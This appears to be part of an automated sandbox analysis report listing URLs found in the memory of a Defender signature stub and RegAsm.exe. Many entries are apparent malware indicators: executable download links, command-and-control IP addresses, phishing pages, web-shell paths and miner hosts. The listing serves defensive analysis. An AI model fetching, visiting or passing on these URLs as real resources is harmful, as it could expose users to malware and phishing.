Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.usaa.com/inet/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.usatoday.com/search/results?q=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.v9.com/v9tb/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.v9tr.com
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: http://www.virtrigger.com
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: http://www.virtrigger.coma
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://www.voxcards.com.br
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://www.wajam.com/webenhancer/logging
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://www.wajam.com/webenhancer/loggingxM
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.webflora.co.kr/slog/skin/setup.ini
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.webtreats.info/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.webye163.cn
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://www.win-spy.com/update
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.win-touch.com
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://www.windupdates.com
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: http://www.winferno.com/re/support.asp
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.wintask16.com/exc2.txt
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://www.wisefixer.com/
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://www.woothemes.com/flexslider/
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wordsmyth.net/cgi-bin/search.cgi
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.wosss.com/search.aspx?q=%s
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.wuweigame.com/asp/y.js
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.wuweixian.com/we_down/k2_v/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.xanga.com
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://www.xia3.com/
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.xiuzhe.com/ddvan.exe
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.xpassgenerator.com/software/d
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://www.xpsecuritycenter.com/XPSecurityCenter/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.xupiter.com/d
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://www.xzwrn.cn/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.yahoo.com
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://www.yessearches.com/?ts=
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://www.yfdc.com.tw/wp-content/uploads/2015/11/z.htm
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://www.yihaha.net/
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://www.youndoo.com/?z=
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtoba01.hpg.com.br
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/
Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=nqpod5at30g
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ysbweb.com/ist/scripts/ysb_prompt.php?retry=2&loadfirst=1&delayload=0&software_id=10&acco
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.yuyu.com/?fav2
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.ziduscapital.com/en/_mmserverscripts/index.php?e=)
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.zixzelz1.narod.ru/
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.znoo.net
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.zv05.com/sys2a
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.zxboy.com#http://
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://www1.yzsc.cn/cash
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www5.baidu.com/baidu?
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www5.baidu.com/s?
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://www6.badesugerwakirpos.com/chr/907/nt.exe
Source: MpSigStub.exe, 00000023.00000003.6312714800.0000028BD7136000.00000004.00000001.sdmp	String found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://wwwwww.f2kk.cn
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://x0.nl/install/
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://x01c4fr.sed.doormedic.com
Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: RegAsm.exe, 0000000A.00000002.7255877964.0000000020340000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/%
Source: RegAsm.exe, 0000000A.00000002.7228491604.0000000001518000.00000004.00000020.sdmp	String found in binary or memory: http://x1.i.lencr.org/&
Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://xhuehs.cantvenlinea.ru:1942
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://xinblasta.us/cj/siyrhz.doc
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://xisake.biz/control/
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://xmr-services.com/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://xmr.enjoytopic.tk
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://xn----dtbhbqh9ajceeeg2m.org/components
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://xpressdelivery.ga/guangzhou/guangzhou2.html)
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://xupaeudenovo.net/net.jsp
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://xvive.com/twiki/b.txt
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://xwjhdjylqeypyltby.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://xx.522love.cn/tool/down
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8ar
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8he
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8qq
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8u9
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e9yp
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/ecpx
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://xzqpl.chujz.com/l14.gif
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://xzsite.chujz.com/soft/ad.html
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://y31uv4ra1.vo.llnwd.net/js/advancedmactuneup/macpro/mcprinfo.ini
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://yamaofficial.com/rxuczm/3415201.png
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://yantarbereg.ru/goodl.js
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://yasovetn1k.ru/files/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://yawaop.com/anna.doc
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://ydlevents.com.my/www/ucountredeem/php/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://yeabests.cc
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://ygsondheks.info/c/
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://yobe.me?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://yoga-berry.com?
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://your_updater.com/privacy-policyso.html
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://youssef-tawil.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://yuksekovabali.com/rgvtr6wcaw2yyy6pkz6qvrj6)
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://yupsearch.com
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://yy.web1000wip.com:4567/bnb/css.js
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://z1.nf-2.net/512.txt
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://z360.net/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://z7v8.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: http://zaxarstore2.com/download.php
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.allgreathost.com
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage1.org
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage2.org
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage3.org
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.sisdotnet.com
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.xujace.com
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://zhsh.j.nj.twsapp.com
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://zief.pl/rc/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://zigyyt.com/trix.exe
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://zillot.kz/System/mysql/users.php
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://zistiran.com/invoice-for-you/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://zlnewly.hk/fun.exe
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://zr.webhop.org:1337
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://zsxz.zhongsou.com/route/
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://zxtenrnewlaunchinworldwide.mangospot.net/.-..................................................
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://zz.8282.space/nw/ss/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://zzease.com/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://zzobpk.ba/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: https://%s/ews/exchange.asmx
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/auth.owa
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/lang.owa
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/meetingpollhandler.ashx
Source: MpSigStub.exe, 00000023.00000003.6326325485.0000028BD642E000.00000004.00000001.sdmp	String found in binary or memory: https://%s/si.jsp
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://09e26c1d.ngrok.io/exploit/jprotected.exe
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://0utl00k.net/docs
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://145855projectframingltd-my.sharepoint.com/:b:/g/personal/jan_projectframing_com/evmq9_ggpulc
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: https://179.43.134.164:443
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: https://185.118.167.189:44
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: https://185.180.199.102/
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: https://1876479389.rsc.cdn77.org/p2r.php
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://193.29.15.147
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://1drv.ms/w/s
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: https://23.95.238.122:443
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/1spk97.gif
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://42801.weebly.com/uploads/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://7college.du.ac.bd/upload/mukrimul/0/beans.php
Source: RegAsm.exe, 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7246898879.000000001E31B000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000003.3539195164.000000001CEB1000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7247260470.000000001E345000.00000004.00000001.sdmp	String found in binary or memory: https://Wj037qRNa0KmI3cZ.org
Source: RegAsm.exe, 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp	String found in binary or memory: https://Wj037qRNa0KmI3cZ.orgt-
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: https://a.doko.moe/uvjwpr.sct
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: https://a.pomf.cat/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://a.pomfe.co/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://a.top4top.net/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://a12.aioecoin
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: https://a12.aioecoin.org/609710d5b915bc7
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://aamilah.co.uk/ds/0302.gif
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://ab.v-mail.online/?e=
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://abgchina.org/roundcubes/roundcube/soundcube.web/1file.php
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://abiesalamat.com/wp-brent/toolzlord.php
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: https://abpandh.com/drms/fert.html
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: https://abpnco.com/naywplqm/04.html
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: https://account.qq.com/cgi-bin/auth_forget
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://acquatrat.com.br/wp-admin/maint/audio2/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://activate.utorrent.com
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://addledsteamb.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://addledsteamb.xyz/baygoda0nuq2oey1rta2odg4rdhcqzleqzrbruu3qta5oui=
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://adegt.com/wp-includes/sodium_co
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: https://adop109.000webhostapp.com/index.html
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://aframe.io/releases/0.7.1/aframe.min.js
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: https://agent.wizztrakys.com/a_
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://agilefield53.com/rb/excelzz/index.php
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://aimsnotification.info/soyakim
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://airsoftne.com.br/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: https://ajcbhjehkbf.25u.com/rom/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://alfahad.io/ocart2/admin/controller/catalog/gr.mpwq
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp	String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp	String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://alpine.kz/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: https://am.localstormwatch00.localstormw
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://amigosforever.net/d/
